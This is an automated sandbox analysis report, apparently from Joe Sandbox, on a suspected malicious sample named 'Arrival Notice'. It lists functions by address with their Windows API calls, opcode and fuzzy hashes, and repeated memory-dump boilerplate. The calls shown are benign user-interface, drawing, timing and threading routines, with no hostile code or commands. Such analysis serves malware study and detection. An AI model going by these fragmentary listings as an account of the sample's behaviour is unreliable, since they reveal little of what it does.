Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182

_wcslen.LIBCMT ref: 004438CD
_wcslen.LIBCMT ref: 004438E6
_wcstok.LIBCMT ref: 004438F8
_wcslen.LIBCMT ref: 0044390C
GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
_wcstok.LIBCMT ref: 00443931

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
String ID:
API String ID: 3632110297-0
Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5

Function 00455168 Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON

Download Yara Rule

APIs

DestroyMenu.USER32(?), ref: 004551D4
DestroyMenu.USER32(?), ref: 004551EA
DeleteObject.GDI32(?), ref: 00455736
DeleteObject.GDI32(?), ref: 00455744
DestroyIcon.USER32(?), ref: 00455752
DestroyWindow.USER32(?), ref: 00455760

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Destroy$DeleteMenuObject$IconWindow
String ID:
API String ID: 752480666-0
Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59

Function 004552FA Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00455362
ImageList_Destroy.COMCTL32(?), ref: 00455374
DeleteObject.GDI32(?), ref: 00455736
DeleteObject.GDI32(?), ref: 00455744
DestroyIcon.USER32(?), ref: 00455752
DestroyWindow.USER32(?), ref: 00455760

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Destroy$DeleteObjectWindow$IconImageList_
String ID:
API String ID: 3275902921-0
Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58

Function 004556C8 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON

Download Yara Rule

APIs

ImageList_Destroy.COMCTL32(?), ref: 004556D0
DestroyWindow.USER32(?), ref: 00455728
DeleteObject.GDI32(?), ref: 00455736
DeleteObject.GDI32(?), ref: 00455744
DestroyIcon.USER32(?), ref: 00455752
DestroyWindow.USER32(?), ref: 00455760

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Destroy$DeleteObjectWindow$IconImageList_
String ID:
API String ID: 3275902921-0
Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69

Function 004331A2 Relevance: 9.1, APIs: 6, Instructions: 64sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4

Function 004555A8 Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32 ref: 004555C7
SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
DeleteObject.GDI32(?), ref: 00455736
DeleteObject.GDI32(?), ref: 00455744
DestroyIcon.USER32(?), ref: 00455752
DestroyWindow.USER32(?), ref: 00455760

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: DeleteDestroyMessageObjectSend$IconWindow
String ID:
API String ID: 3691411573-0
Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68

Function 00447275 Relevance: 9.0, APIs: 6, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266

MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
LineTo.GDI32(?,?,?), ref: 004472AC
MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
LineTo.GDI32(?,?,?), ref: 004472C6
EndPath.GDI32(?), ref: 004472D6
StrokePath.GDI32(?), ref: 004472E4

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
String ID:
API String ID: 372113273-0
Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD

Function 0044CC51 Relevance: 9.0, APIs: 6, Instructions: 50COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0044CC6D
GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4

Function 00417082 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0041708E

Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79

__amsg_exit.LIBCMT ref: 004170AE
__lock.LIBCMT ref: 004170BE
InterlockedDecrement.KERNEL32(?), ref: 004170DB
_free.LIBCMT ref: 004170EE
InterlockedIncrement.KERNEL32(02FA2DB8), ref: 00417106

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: 24516f4010ce0b93e8566e6a8de288d1d1524a4de8e6263f522fbb499f39661f
Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
Opcode Fuzzy Hash: 24516f4010ce0b93e8566e6a8de288d1d1524a4de8e6263f522fbb499f39661f
Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD

Function 0044B63B Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 0044B655
EnterCriticalSection.KERNEL32(?), ref: 0044B666
TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682

Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622

InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
LeaveCriticalSection.KERNEL32(?), ref: 0044B69E

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6

Function 00410AB0 Relevance: 9.0, APIs: 6, Instructions: 40keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69

Function 004151BB Relevance: 9.0, APIs: 6, Instructions: 29threadCOMMON

Download Yara Rule

APIs

___set_flsgetvalue.LIBCMT ref: 004151C0

Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8

___fls_getvalue@4.LIBCMT ref: 004151CB

Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C

___fls_setvalue@8.LIBCMT ref: 004151DD
GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
ExitThread.KERNEL32 ref: 004151ED
__freefls@4.LIBCMT ref: 00415209

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
String ID:
API String ID: 442100245-0
Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669

Function 0045F790 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 216windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182

GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
_wcslen.LIBCMT ref: 0045F94A
SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE

Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1

SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA

Strings

0, xrefs: 0045F829

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
String ID: 0
API String ID: 621800784-4108050209
Opcode ID: 81ac811d22c35f9fa91ba742b1be7df183685e8d6235a52bfd7a192db436f1c3
Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
Opcode Fuzzy Hash: 81ac811d22c35f9fa91ba742b1be7df183685e8d6235a52bfd7a192db436f1c3
Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B

Function 00478172 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 176COMMON

Download Yara Rule

APIs

Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57

SetErrorMode.KERNEL32 ref: 004781CE
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387

Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F

SetErrorMode.KERNEL32(?), ref: 00478270
SetErrorMode.KERNEL32(?), ref: 00478340

Strings

\VH, xrefs: 00478203

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: ErrorMode$AttributesFile_memmove_wcslen
String ID: \VH
API String ID: 3884216118-234962358
Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96

Function 00448480 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
IsMenu.USER32(?), ref: 0044854D
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
DrawMenuBar.USER32 ref: 004485AF

Strings

0, xrefs: 0044849A

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
